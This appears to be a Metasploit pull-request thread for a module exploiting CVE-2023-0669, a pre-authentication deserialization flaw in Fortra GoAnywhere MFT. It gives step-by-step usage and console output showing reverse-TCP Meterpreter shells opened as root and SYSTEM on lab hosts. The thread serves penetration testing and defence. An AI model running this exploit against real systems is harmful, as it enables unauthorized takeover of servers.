Fortra deserialization RCE CVE-2023-0669 (ETR)

[rbowes-r7]

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/linux/http/fortra_goanywhere_rce_cve_2023_0669
• set LHOST / set RHOST / exploit
• You should get a shell

I included a documentation file with lots of info / examples. LMK if you need the software (a copy should be on our vulnerable software drive).

Cheers!

[rbowes-r7]

Thanks, Spencer! Fixed both of those comments

[rbowes-r7]

Your changes are great, and work fine. Thanks! Merged in

[smcintyre-r7]

Working like a champ on windows and linux now. I'll get this landed in a second.

Testing Output

msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669 
show o	
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > show options 

Module options (exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8001                    yes       The target port (TCP)
   SSL        true                    no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/lic/accept  yes       Unsafe deserialization endpoint
   VHOST                              no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.250.134  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Version 2 Encryption



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 192.168.159.9
RHOSTS => 192.168.159.9
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Sending stage (24380 bytes) to 192.168.250.237
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 192.168.250.237:64834) at 2023-02-08 12:53:56 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-1160.81.1.el7.x86_64 #1 SMP Fri Dec 16 17:29:43 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (175686 bytes) to 192.168.159.10
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:55070) at 2023-02-08 12:54:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter > background 
[*] Backgrounding session 2...
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set EncryptionIv fooo
[-] The following options failed to validate: Value 'fooo' is not valid for option 'EncryptionIv'.
EncryptionIv => 4145532f4342432f504b435335506164
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set EncryptionIv 4145532f4342432f504b4353355061644141
EncryptionIv => 4145532f4342432f504b4353355061644141
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Msf::OptionValidateError The following options failed to validate:
[-] Invalid option EncryptionIv: The encryption IV is not the correct length (is: 18, should be: 16).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > 

[todb]

CVE-2023-0669 references updated.

[stevenseeley]

Nice work, however I think it’s fair to put Fryco as a reference since he found it in 2021: https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html

[rbowes-r7]

Oh yeah, not a bad idea! I put him on the AttackerKB already

[todb]

Oh for sure! Done.

[h00die-gr3y]

Please check the documentation.
It stills refers to msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) instead of msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669)

[jmartin-tech]

Release Notes

This adds an exploit targeting CVE-2023-0669, a pre-authentication deserialization that effects Fortra GoAnywhere MFT.